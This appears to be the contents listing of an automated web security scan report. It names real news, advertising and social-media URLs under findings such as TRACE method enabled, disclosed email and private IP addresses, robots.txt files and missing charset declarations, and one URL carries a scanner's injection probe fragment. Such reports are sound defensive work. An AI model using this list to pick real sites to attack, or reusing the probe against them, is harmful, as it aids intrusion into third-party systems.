22.84. https://www.google.com/adsense/support/bin/request.py

22.85. http://www.isomedia.com/business-vps.shtml

22.86. http://www.magicbricks.com/bricks/propertySearch.html

22.87. http://www.magicbricks.com/bricks/viewProperty.html

22.88. http://www.mid-day.com/news/index.htm/x26amp

22.89. http://www.mid-day.com/news/local/index.htm/x26amp

22.90. http://www.mumbaimirror.com/index.aspx

22.91. http://www.nationmultimedia.com/

22.92. http://www.nationmultimedia.com/breakingnews/

22.93. http://www.nationmultimedia.com/home/Music-to-calm-the-savage-diplomatic-beast-US-band--30164372.html

22.94. http://www.nationmultimedia.com/home/banner/125x125_food.htm

22.95. http://www.nationmultimedia.com/home/banner/ad_set1.html

22.96. http://www.nationmultimedia.com/home/banner/index_a13.html

22.97. http://www.nationmultimedia.com/home/banner/index_a2.html

22.98. http://www.nationmultimedia.com/home/banner/index_b2.html

22.99. http://www.nationmultimedia.com/home/banner/index_b5.html

22.100. http://www.nationmultimedia.com/home/banner/section/Breakingnews/300x250Breakingnews.html

22.101. http://www.nationmultimedia.com/home/nt-widget/ann-feed.html

22.102. http://www.nationmultimedia.com/national/

22.103. http://www.nationmultimedia.com/specials/nationphoto/show.php

22.104. http://www.nationmultimedia.com/specials/nationvdo/showvdo.php

22.105. http://www.ndtv.com/article/cities/mumbai-airports-main-runway-shut-till-8-am-flights-delayed-131003

22.106. http://www.ndtv.com/article/cities/mumbai-airports-main-runway-still-shut-flights-delayed-131003

22.107. http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142

22.108. http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917

22.109. http://www.ndtv.com/search

22.110. http://www.ndtv.com/trends

22.111. http://www.ndtv.com/video/player/flashback/flashback-the-magic-of-rishi-kapoor/209786

22.112. http://www.ndtv.com/video/player/news/no-regrets-for-tweet-on-afzal-guru-says-omar-abdullah/209797

22.113. http://www.ndtv.com/video/player/the-big-fight/life-or-death-should-terrorists-be-shown-mercy/209810

22.114. http://www.ndtv.com/video/player/the-car-bike-show/first-look-at-hondas-small-car-for-india-brio/209809

22.115. http://www.networkadvertising.org/managing/opt_out.asp

22.116. http://www.networkadvertising.org/managing/opt_out.asp

22.117. http://www.networkadvertising.org/managing/optout_results.asp

22.118. http://www.newspaperdirect.com/inprint/default.aspx

22.119. http://www.simplymarry.com/timesmatri/faces/jsp/profileDisplay.jsp

22.120. http://www.ticketmaster.com/Sporting-Kansas-City-tickets/artist/805957

22.121. http://www.timesjobs.com/candidate/job-search.html

22.122. http://www.timesjobs.com/candidate/quickSearch.html

22.123. http://www.youtube.com/results

22.124. http://www.zigwheels.com/dealeroffer.php

22.125. http://www2.panasonic.com/consumer-electronics/learn/Cameras-Camcorders/Digital-Cameras/index.jsp

23. File upload functionality

24. TRACE method is enabled

24.1. http://223.165.24.159/

24.2. http://33across.com/

24.3. http://ads.masslive.com/

24.4. http://ads.mlive.com/

24.5. http://ads.nationchannel.com/

24.6. http://ads.nationmultimedia.com/

24.7. http://ads.oregonlive.com/

24.8. http://ads.reach360ads.com/

24.9. http://ads3.bangkokpost.co.th/

24.10. http://ads4.bangkokpost.co.th/

24.11. http://adssrv.nationmultimedia.com/

24.12. http://adstil.indiatimes.com/

24.13. http://advertising.aol.com/

24.14. http://avn.innity.com/

24.15. http://bh.contextweb.com/

24.16. http://clk.fetchback.com/

24.17. http://cps.regis.edu/

24.18. http://d.tradex.openx.com/

24.19. http://dna1.mookie1.com/

24.20. http://domdex.com/

24.21. http://dp.33across.com/

24.22. http://ecommerce.nationgroup.com/

24.23. http://feed.mikle.com/

24.24. http://fetchback.com/

24.25. http://ibeat.indiatimes.com/

24.26. http://idiva.com/

24.27. http://image2.pubmatic.com/

24.28. http://img.pulsemgr.com/

24.29. http://imp.fetchback.com/

24.30. http://login.dotomi.com/

24.31. http://matcher-rbc.bidder7.mookie1.com/

24.32. http://member.bangkokpost.com/

24.33. http://mobile.indiatimes.com/

24.34. http://nai.ad.us-ec.adtechus.com/

24.35. http://nai.adserver.adtechus.com/

24.36. http://nai.adserverec.adtechus.com/

24.37. http://nai.adserverwc.adtechus.com/

24.38. http://nai.adsonar.com/

24.39. http://nai.adtech.de/

24.40. http://nai.advertising.com/

24.41. http://nai.btrll.com/

24.42. http://nai.glb.adtechus.com/

24.43. http://nai.tacoda.at.atwola.com/

24.44. http://nocookie.w55c.net/

24.45. http://notrack.adviva.net/

24.46. http://notrack.specificclick.net/

24.47. http://notrack.specificmedia.com/

24.48. http://optimized-by.rubiconproject.com/

24.49. http://optout.33across.com/

24.50. http://optout.adlegend.com/

24.51. http://optout.mookie1.com/

24.52. http://optout.mookie1.decdna.net/

24.53. http://optout.mookie1.decideinteractive.com/

24.54. http://optout.mookie1.pm14.com/

24.55. http://picasaweb.google.com/

24.56. http://pixel.33across.com/

24.57. http://pixel.fetchback.com/

24.58. http://pixel.rubiconproject.com/

24.59. http://pixel.traveladvertising.com/

24.60. http://plg3.yumenetworks.com/

24.61. http://r.openx.net/

24.62. http://s.xp1.ru4.com/

24.63. http://search.spotxchange.com/

24.64. http://server3.yowindow.com/

24.65. http://shopping.indiatimes.com/

24.66. http://smart.synergy-e.com/

24.67. http://socialappsintegrator.indiatimes.com/

24.68. http://srv.clickfuse.com/

24.69. http://stat.synergy-e.com/

24.70. http://swf.yowindow.com/

24.71. http://system.casalemedia.com/

24.72. http://t.mookie1.com/

24.73. http://tap.rubiconproject.com/

24.74. http://timescity.com/

24.75. http://twitterapi.indiatimes.com/

24.76. http://usucmweb.dotomi.com/

24.77. http://www.addthis.com/

24.78. http://www.asianewsnet.net/

24.79. http://www.bangkokpost.com/

24.80. http://www.casalemedia.com/

24.81. http://www.crosspixel.net/

24.82. http://www.egnyte.com/

24.83. http://www.fetchback.com/

24.84. http://www.isomedia.com/

24.85. http://www.magicbricks.com/

24.86. http://www.mathtag.com/

24.87. http://www.nationejobs.com/

24.88. http://www.nationmultimedia.com/

24.89. http://www.npr.org/

24.90. http://www.simplymarry.com/

24.91. http://www.timescity.com/

24.92. http://www.tribalfusion.com/

24.93. http://www.zigwheels.com/

24.94. http://yads.zedo.com/

25. Email addresses disclosed

25.1. http://ads4.bangkokpost.co.th/ads_server/iframe/

25.2. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH

25.3. http://advertising.aol.com/finish/0/4/1/

25.4. http://advertising.aol.com/finish/1/4/1/

25.5. http://advertising.aol.com/finish/2/4/1/

25.6. http://advertising.aol.com/finish/3/4/1/

25.7. http://advertising.aol.com/finish/4/4/1/

25.8. http://advertising.aol.com/finish/5/4/1/

25.9. http://advertising.aol.com/finish/6/4/1/

25.10. http://advertising.aol.com/finish/7/4/1/

25.11. http://advertising.aol.com/finish/8/4/1/

25.12. http://advertising.aol.com/token/0/2/1170877546/

25.13. http://advertising.aol.com/token/0/3/1885310732/

25.14. http://advertising.aol.com/token/1/1/1462706141/

25.15. http://advertising.aol.com/token/1/3/1308197307/

25.16. http://advertising.aol.com/token/2/2/2011729621/

25.17. http://advertising.aol.com/token/2/3/868831419/

25.18. http://advertising.aol.com/token/3/2/1144859041/

25.19. http://advertising.aol.com/token/3/3/963398391/

25.20. http://advertising.aol.com/token/4/1/1214941173/

25.21. http://advertising.aol.com/token/4/3/1727096706/

25.22. http://advertising.aol.com/token/5/2/2011695027/

25.23. http://advertising.aol.com/token/5/3/803328935/

25.24. http://advertising.aol.com/token/6/1/737485457/

25.25. http://advertising.aol.com/token/6/3/807811660/

25.26. http://advertising.aol.com/token/7/1/585611182/

25.27. http://advertising.aol.com/token/7/3/1807570122/

25.28. http://advertising.aol.com/token/8/1/592246145/

25.29. http://advertising.aol.com/token/8/3/1337747048/

25.30. http://cps.regis.edu/lp/computer_degree/it_degree.php

25.31. http://ibeat.indiatimes.com/js/pgtracking.js

25.32. http://images.google.com/support/bin/answer.py

25.33. https://maps-api-ssl.google.com/maps

25.34. http://maps.google.com/maps

25.35. http://member.bangkokpost.com/login.php

25.36. http://ndtvjobs.bixee.com/search/search/

25.37. http://social.ndtv.com/NDTVProfit

25.38. http://social.ndtv.com/groups.php

25.39. http://social.ndtv.com/home.php

25.40. http://social.ndtv.com/tbModel/comments.php

25.41. http://timesofindia.indiatimes.com/articleshow_js_v11.cms

25.42. http://timesofindia.indiatimes.com/new_cmtofart2_v4/9855193.cms

25.43. http://timesofindia.indiatimes.com/nv_js_v53.cms

25.44. http://translate.google.com/

25.45. http://www.asaservers.com/showpages.asp

25.46. http://www.bangkokpost.com/

25.47. http://www.bangkokpost.com/blogs/index.php/2011/08/30/small-parties-can-always-win-at-a-stretc

25.48. http://www.bangkokpost.com/blogs/index.php/2011/08/31/transparency-call-for-new-women-s-fund

25.49. http://www.bangkokpost.com/blogs/index.php/2011/09/02/in-venice-madonna-and-her-movie

25.50. http://www.bangkokpost.com/blogs/index.php/2011/09/03/in-venice-jung-freud-and-the-glory-of-pr

25.51. http://www.bangkokpost.com/business/

25.52. http://www.bangkokpost.com/business/telecom

25.53. http://www.bangkokpost.com/classified/viewforum.php

25.54. http://www.bangkokpost.com/common/js/calendar.js

25.55. http://www.bangkokpost.com/forum/search.php

25.56. http://www.bangkokpost.com/forum/viewforum.php

25.57. http://www.bangkokpost.com/forum/viewtopic.php

25.58. http://www.bangkokpost.com/search/news-and-article

25.59. http://www.google.com/advanced_search

25.60. http://www.google.com/finance

25.61. http://www.google.com/hostednews/afp/article/ALeqM5gm3VCeTz71UMLIhqucTh7x2Pzicw

25.62. http://www.google.com/hostednews/afp/article/ALeqM5jgTMTleLrfnZNS2m7IZ6da8aJZ9w

25.63. http://www.google.com/maps

25.64. http://www.google.com/preferences

25.65. http://www.google.com/quality_form

25.66. http://www.google.com/reader/link

25.67. http://www.google.com/reader/view/

25.68. http://www.google.com/support/websearch/bin/answer.py

25.69. http://www.google.com/webhp

25.70. https://www.google.com/accounts/ServiceLogin

25.71. https://www.google.com/adsense/support/bin/request.py

25.72. https://www.gotomeeting.com/t/gcon/2011_Q3/Contextual_CC/160x600/g2m_HDFaceslp

25.73. http://www.mid-day.com/news/index.htm/x26amp

25.74. http://www.modestogov.com/departments/x26amp

25.75. http://www.modestogov.com/mpd/x26amp

25.76. http://www.mumbaimirror.com/index.aspx

25.77. http://www.nationmultimedia.com/

25.78. http://www.nationmultimedia.com/breakingnews/

25.79. http://www.nationmultimedia.com/home/Music-to-calm-the-savage-diplomatic-beast-US-band--30164372.html

25.80. http://www.nationmultimedia.com/home/twitter-api/widget.js

25.81. http://www.nationmultimedia.com/national/

25.82. http://www.nationmultimedia.com/specials/nationphoto/show.php

25.83. http://www.nationmultimedia.com/specials/nationvdo/showvdo.php

25.84. http://www.scb.co.th/scb_api/scbapi.jsp

25.85. http://www.simplymarry.com/timesmatri/faces/jsp/profileDisplay.jsp

25.86. http://www.tmd.go.th/en/province.php

26. Private IP addresses disclosed

26.1. http://ad4.liverail.com/

26.2. http://ad4.liverail.com/

26.3. http://ad4.liverail.com/

26.4. http://api.facebook.com/restserver.php

26.5. http://api.facebook.com/restserver.php

26.6. http://api.facebook.com/restserver.php

26.7. http://api.facebook.com/restserver.php

26.8. http://connect.facebook.net/en_US/all.js

26.9. http://connect.facebook.net/en_US/all.js

26.10. http://connect.facebook.net/en_US/all.js

26.11. http://connect.facebook.net/en_US/all.js

26.12. http://connect.facebook.net/en_US/all.js

26.13. http://connect.facebook.net/rsrc.php/v1/yK/r/RIxWozDt5Qq.swf

26.14. http://developers.facebook.com/plugins/

26.15. http://external.ak.fbcdn.net/safe_image.php

26.16. http://external.ak.fbcdn.net/safe_image.php

26.17. http://static.ak.connect.facebook.com/connect.php/en_US

26.18. http://static.ak.connect.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

26.19. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

26.20. http://static.ak.connect.facebook.com/images/loaders/indicator_white_large.gif

26.21. http://static.ak.fbcdn.net/connect.php/js/FB.Share

26.22. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.23. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.24. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/ql9vukDCc4R.png

26.25. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/bSOHtKbCGYI.png

26.26. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/GetYmfGSJIt.css

26.27. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/zZEOQP4uOC1.gif

26.28. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/9F14AO7Mj6i.js

26.29. http://trk.tidaltv.com/Trace.axd

26.30. http://www.connect.facebook.com/widgets/fan.php

26.31. http://www.connect.facebook.com/widgets/fan.php

26.32. http://www.connect.facebook.com/widgets/fan.php

26.33. http://www.connect.facebook.com/widgets/fan.php

26.34. http://www.facebook.com/campaign/landing.php

26.35. http://www.facebook.com/extern/login_status.php

26.36. http://www.facebook.com/extern/login_status.php

26.37. http://www.facebook.com/extern/login_status.php

26.38. http://www.facebook.com/extern/login_status.php

26.39. http://www.facebook.com/extern/login_status.php

26.40. http://www.facebook.com/extern/login_status.php

26.41. http://www.facebook.com/pages/Friends-of-The-Nation/147232991936

26.42. http://www.facebook.com/plugins/like.php

26.43. http://www.facebook.com/plugins/like.php

26.44. http://www.facebook.com/plugins/like.php

26.45. http://www.facebook.com/plugins/like.php

26.46. http://www.facebook.com/plugins/like.php

26.47. http://www.facebook.com/plugins/like.php

26.48. http://www.facebook.com/plugins/like.php

26.49. http://www.facebook.com/plugins/like.php

26.50. http://www.facebook.com/plugins/like.php

26.51. http://www.facebook.com/plugins/like.php

26.52. http://www.facebook.com/plugins/like.php

26.53. http://www.facebook.com/plugins/like.php

26.54. http://www.facebook.com/plugins/like.php

26.55. http://www.facebook.com/plugins/like.php

26.56. http://www.facebook.com/plugins/like.php

26.57. http://www.facebook.com/plugins/like.php

26.58. http://www.facebook.com/plugins/recommendations.php

26.59. http://www.facebook.com/plugins/recommendations.php

26.60. http://www.facebook.com/sharer.php

27. Robots.txt file

27.1. http://33across.com/api/opt-out.php

27.2. http://a.netmng.com/opt-status.php

27.3. http://a.rfihub.com/nai_check_status.gif

27.4. http://a.tribalfusion.com/displayAd.js

27.5. http://ad-apac.doubleclick.net/adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2

27.6. http://ad.afy11.net/ad

27.7. http://ad.doubleclick.net/adj/N3340.152125.OZONEMEDIA.COM/B5807973

27.8. http://ad.turn.com/server/ads.js

27.9. http://ad.yieldmanager.com/pixel

27.10. http://ad4.liverail.com/crossdomain.xml

27.11. http://adclick.g.doubleclick.net/aclk

27.12. http://adcontent.videoegg.com/ads/MicrosoftOffice/Office7Upgra-USA-13364/AdFramesV2/office7Upgrade_Twig.swf

27.13. http://ads.amgdgt.com/ads/opt-out

27.14. http://ads.bluelithium.com/st

27.15. http://ads.indiatimes.com/ads.dll/getad

27.16. http://ads.reach360ads.com/www/ads/iframe.php

27.17. http://ads.undertone.com/fc.php

27.18. http://ads3.bangkokpost.co.th/www/delivery/spc.php

27.19. http://adscontent.indiatimes.com/photo/7596584.cms

27.20. http://adscontent2.indiatimes.com/photo/9101637.cms

27.21. http://adserver.adtech.de/crossdomain.xml

27.22. http://adserver.adtechus.com/addyn/3.0/5132/1305477/0/170/ADTECH

27.23. http://advertising.aol.com/nai/nai.php

27.24. https://adwords.google.com/um/StartNewLogin

27.25. http://api.facebook.com/restserver.php

27.26. http://as.casalemedia.com/j

27.27. http://as.serving-sys.com/OptOut/nai_optout_results.aspx

27.28. http://avn.innity.com/avnview.php

27.29. http://b.scorecardresearch.com/b

27.30. http://blogs.timesofindia.indiatimes.com/main/page/recentEntriesFeed

27.31. http://c7.zedo.com/img/bh.gif

27.32. http://cas.criteo.com/delivery/afr.php

27.33. http://cdn.dnaindia.com/images/710/favicon-google-bookmark.ico

27.34. http://cdn.optmd.com/V2/88918/233260/index.html

27.35. http://cdn.turn.com/server/ddc.htm

27.36. http://clk.atdmt.com/goiframe/171946551/278612752/direct

27.37. http://clk.fetchback.com/serve/fb/click

27.38. http://cm.g.doubleclick.net/pixel

27.39. http://cps.regis.edu/lp/computer_degree/it_degree.php

27.40. http://d.tradex.openx.com/afr.php

27.41. http://d13.zedo.com/OzoDB/cutils/R53_7_5/jsc/767/zpu.html

27.42. http://d2.zedo.com/jsc/d2/ff2.html

27.43. http://d3.zedo.com/jsc/d3/ff2.html

27.44. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js

27.45. http://dis.criteo.com/dis/rtb/google/cookiematch.aspx

27.46. http://dis.sv.us.criteo.com/dis/dis.aspx

27.47. http://dna1.mookie1.com/n/97164/98396/www.bp.com/1979rp7

27.48. https://docs.google.com/

27.49. http://domdex.com/nai_optout_status.php

27.50. http://dp.33across.com/ps/

27.51. http://events.adchemy.com/visitor/auuid/nai-status

27.52. http://fetchback.com/serve/fb/optout

27.53. http://googleads.g.doubleclick.net/pagead/ads

27.54. http://groups.google.com/groups

27.55. http://ib.mookie1.com/image.sbmx

27.56. http://idiva.com/index.php

27.57. http://images.google.com/support/bin/answer.py

27.58. http://images.photogallery.indiatimes.com/photo/8179309.cms

27.59. http://img.pulsemgr.com/optout

27.60. http://imp.fetchback.com/serve/fb/adtag.js

27.61. http://l.addthiscdn.com/live/t00/250lo.gif

27.62. http://load.exelator.com/load/

27.63. http://login.dotomi.com/ucm/UCMController

27.64. https://mail.google.com/mail/

27.65. https://maps-api-ssl.google.com/maps

27.66. http://maps.google.com/maps

27.67. https://market.android.com/developer

27.68. http://media2.legacy.com/bind

27.69. http://nai.ad.us-ec.adtechus.com/nai/daa.php

27.70. http://nai.adserver.adtechus.com/nai/daa.php

27.71. http://nai.adserverec.adtechus.com/nai/daa.php

27.72. http://nai.adserverwc.adtechus.com/nai/daa.php

27.73. http://nai.adsonar.com/nai/daa.php

27.74. http://nai.adtech.de/nai/daa.php

27.75. http://nai.advertising.com/nai/daa.php

27.76. http://nai.btrll.com/nai/status

27.77. http://nai.glb.adtechus.com/nai/daa.php

27.78. http://nai.tacoda.at.atwola.com/nai/daa.php

27.79. http://ndtvjobs.bixee.com/search/search/

27.80. http://netspiderads2.indiatimes.com/ads.dll/getad

27.81. http://netspiderads3.indiatimes.com/ads.dll/getad

27.82. http://news.google.com/news/story

27.83. http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e

27.84. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1442444284@Top

27.85. http://optout.33across.com/api/

27.86. http://optout.cognitivematch.com/optoutStatus

27.87. http://optout.crwdcntrl.net/optout/check.php

27.88. http://optout.invitemedia.com:9030/check_optout

27.89. http://optout.media6degrees.com/orbserv/NAIStatus

27.90. http://optout.mxptint.net/naistatus.ashx

27.91. http://p.opt.fimserve.com/nai_check.jsp

27.92. http://p4.cbzp2o4y2l4dq.jfb647l4x6a6smpk.714851.s1.v4.ipv6-exp.l.google.com/gen_204

27.93. http://pagead2.googlesyndication.com/pagead/imgad

27.94. http://pbid.pro-market.net/engine

27.95. http://picasaweb.google.com/lh/view

27.96. http://pixel.33across.com/ps/

27.97. http://pixel.adblade.com/log.php

27.98. http://pixel.fetchback.com/serve/fb/optout

27.99. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

27.100. http://pr.prchecker.info/getpr.php

27.101. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064

27.102. http://profile.live.com/badge

27.103. http://property.ndtv.com/ndtv_redirect.php

27.104. http://pubads.g.doubleclick.net/gampad/ads

27.105. http://r.casalemedia.com/rum

27.106. http://r.turn.com/r/beacon

27.107. http://r1-ads.ace.advertising.com/site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms

27.108. http://r1.zedo.com/log/ERR.gif

27.109. http://s.xp1.ru4.com/coop

27.110. http://s.ytimg.com/yt/swfbin/cps-vflNVWyCR.swf

27.111. http://s0.2mdn.net/2230348/IN2033_Earth_728_E.swf

27.112. http://scholar.google.com/scholar

27.113. http://search.spotxchange.com/crossdomain.xml

27.114. http://search.twitter.com/search.json

27.115. http://server3.yowindow.com/crossdomain.xml

27.116. http://shopping.indiatimes.com/ism/faces/tracker.jsp

27.117. https://sites.google.com/

27.118. http://social.ndtv.com/static/Comment/List/

27.119. http://srv.clickfuse.com/pixels/create.php

27.120. http://static.ak.fbcdn.net/connect/xd_proxy.php

27.121. http://swf.yowindow.com/wimo/hpPal/hpPal.swf

27.122. http://sync.mathtag.com/sync/img

27.123. http://t4.liverail.com/

27.124. http://tag.admeld.com/match

27.125. http://thestar.com.my/news/story.asp

27.126. http://timescity.com/widget/toitopestw.php

27.127. http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms

27.128. http://translate.google.com/

27.129. http://tweetmeme.com/auth/login

27.130. http://twitter.com/

27.131. https://twitter.com/home

27.132. http://unitus.synergy-e.com/www/delivery/spcjs.php

27.133. http://web.adblade.com/impsc.php

27.134. http://webcache.googleusercontent.com/search

27.135. http://www.adbrite.com/mb/nai_optout_check.php

27.136. http://www.addthis.com/bookmark.php

27.137. http://www.amazon.com/

27.138. http://www.asaservers.com/showpages.asp

27.139. http://www.bangkokpost.com/

27.140. http://www.bizographics.com/nai/status

27.141. http://www.casalemedia.com/cgi-bin/naiOptout.cgi

27.142. http://www.connect.facebook.com/widgets/fan.php

27.143. http://www.dnaindia.com/

27.144. http://www.egnyte.com/corp/lp1/FTP-site-2.html

27.145. http://www.emirates.com/us/english/index.aspx

27.146. http://www.facebook.com/plugins/like.php

27.147. http://www.fetchback.com/resources/naicheck.php

27.148. http://www.godaddy.com/gdshop/ssl/ssl.asp

27.149. http://www.google-analytics.com/__utm.gif

27.150. http://www.google.com/jsapi

27.151. https://www.google.com/calendar

27.152. http://www.googleadservices.com/pagead/conversion/1033191019/

27.153. http://www.homestead.com/~site/go/search.ffhtml

27.154. http://www.ig.gmodules.com/gadgets/proxy/refresh=86400&container=ig&rewriteMime=application%2Fx-shockwave-flash&gadget=http%3A%2F%2Fyowindow.com%2Fwimo%2Figoogle%2Fyowindow.xml/http://swf.yowindow.com/wimo/hpPal/yowidget.swf

27.155. http://www.isomedia.com/business-vps.shtml

27.156. http://www.jdoqocy.com/click-2118118-10473284

27.157. http://www.linkedin.com/shareArticle

27.158. http://www.magicbricks.com/bricks/viewProperty.html

27.159. http://www.mathtag.com/cgi-bin/optout

27.160. http://www.mediaplex.com/status_pure.php

27.161. http://www.modestogov.com/mpd/x26amp

27.162. http://www.mtv.com/news/articles/1670220/linkin-park-chester-bennington-new-album.jhtml/x26amp

27.163. http://www.mumbaimirror.com/index.aspx

27.164. http://www.nationejobs.com/fulltime/displayposition_thai.php

27.165. http://www.nationmultimedia.com/css/NT-styles.css

27.166. http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142

27.167. http://www.npr.org/music/

27.168. http://www.pulse360.com/behavior/nai-opt-out.html

27.169. http://www.realmedia.com/cgi-bin/nph-verify_oo.cgi

27.170. http://www.simplymarry.com/timesmatri/faces/jsp/searchResult.photo

27.171. http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/

27.172. http://www.taiwannews.com.tw/etn/news_content.php

27.173. http://www.ticketmaster.com/Sporting-Kansas-City-tickets/artist/805957

27.174. http://www.timesjobs.com/candidate/job-search.html

27.175. http://www.tribalfusion.com/optout/verify.js

27.176. http://www.watchindia.tv/AffiliateWiz/aw.aspx

27.177. http://www.youtube-nocookie.com/v/IOje-N90P38&hl=en_US&fs=1&

27.178. http://www.youtube.com/results

27.179. http://www.zigwheels.com/dealeroffer.php

27.180. http://www2.glam.com/app/site/affiliate/nc/gs-optout.act

27.181. http://www2.panasonic.com/consumer-electronics/learn/Cameras-Camcorders/Digital-Cameras/index.jsp

27.182. http://yads.zedo.com/ads2/c

28. Cacheable HTTPS response

28.1. https://maps-api-ssl.google.com/maps

28.2. https://www.google.com/adsense/support/bin/request.py

29. HTML does not specify charset

29.1. http://a.tribalfusion.com/j.ad

29.2. http://ad-apac.doubleclick.net/adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2

29.3. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5641720.250

29.4. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5641720.306

29.5. http://ad.doubleclick.net/clk

29.6. http://ad.yieldmanager.com/iframe3

29.7. http://ad4.liverail.com/util/companions.php

29.8. http://ads.indiatimes.com/ads.dll/genptypead

29.9. http://ads.indiatimes.com/ads.dll/getad

29.10. http://ads.indiatimes.com/ads.dll/photoserv

29.11. http://adscontent.indiatimes.com/photo.cms

29.12. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446945/0/0/ADTECH

29.13. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top

29.14. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top

29.15. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3

29.16. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1

29.17. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2

29.18. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1

29.19. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2

29.20. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1

29.21. http://advertising.aol.com/nai/nai.php

29.22. http://api.tweetmeme.com/ajax/partial

29.23. http://api.tweetmeme.com/v2/follow.js

29.24. http://beacon.videoegg.com/abandoned

29.25. http://beacon.videoegg.com/admodelreceived

29.26. http://beacon.videoegg.com/adpo

29.27. http://beacon.videoegg.com/amcload

29.28. http://beacon.videoegg.com/coreloaded

29.29. http://beacon.videoegg.com/demo

29.30. http://beacon.videoegg.com/domloaded

29.31. http://beacon.videoegg.com/echo

29.32. http://beacon.videoegg.com/init

29.33. http://beacon.videoegg.com/initjs

29.34. http://beacon.videoegg.com/interact

29.35. http://beacon.videoegg.com/invpos

29.36. http://beacon.videoegg.com/pageloaded

29.37. http://beacon.videoegg.com/tload

29.38. http://core.videoegg.com/eap/14533/html/jstags.html

29.39. http://core.videoegg.com/eap/latest/html/jstags.html

29.40. http://cricket.widgets.stats.com/ndtv_wc/miniscorecard_IPL2011.html

29.41. http://d13.zedo.com/OzoDB/cutils/R53_7_5/jsc/767/zpu.html

29.42. http://d2.zedo.com/jsc/d2/ff2.html

29.43. http://d3.zedo.com/jsc/d3/ff2.html

29.44. http://ib.adnxs.com/click

29.45. http://media1.bangkokpost.com/ads/Innity/030911TourismMalaysia728x90.html

29.46. http://mobile.indiatimes.com/pmswapdev_in/pmsdata.html

29.47. http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030

29.48. http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976">1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551

29.49. http://msite.martiniadnetwork.com/index/

29.50. http://netspiderads2.indiatimes.com/ads.dll/getad

29.51. http://netspiderads2.indiatimes.com/ads.dll/getxmlad

29.52. http://netspiderads2.indiatimes.com/ads.dll/photoserv

29.53. http://netspiderads3.indiatimes.com/ads.dll/getad

29.54. http://netspiderads3.indiatimes.com/ads.dll/photoserv

29.55. http://p4.cbzp2o4y2l4dq.jfb647l4x6a6smpk.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html

29.56. http://p4.cbzp2o4y2l4dq.jfb647l4x6a6smpk.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html

29.57. http://ping.chartbeat.net/ping

29.58. http://rcm.amazon.com/e/cm

29.59. http://tidaltv.com/aboutus_who.html

29.60. http://tidaltv.com/favicon.ico

29.61. http://tidaltv.com/optoutconfirm.html

29.62. http://tidaltv.com/publisher_overview.html

29.63. http://tidaltv.com/technology_overview.html

29.64. http://timesofindia.indiatimes.com/configspace/ads/TOI_mumbai_articlelist_36950_TOP.html

29.65. http://timesofindia.indiatimes.com/configspace/ads/googleadsarticlelistbot.html

29.66. http://timesofindia.indiatimes.com/configspace/ads/googleshowbtm.html

29.67. http://timesofindia.indiatimes.com/configspace/ads/googleshowtop.html

29.68. http://timesofindia.indiatimes.com/sponseredlinksros.cms

29.69. http://twitterapi.indiatimes.com/feedtweet/tweet

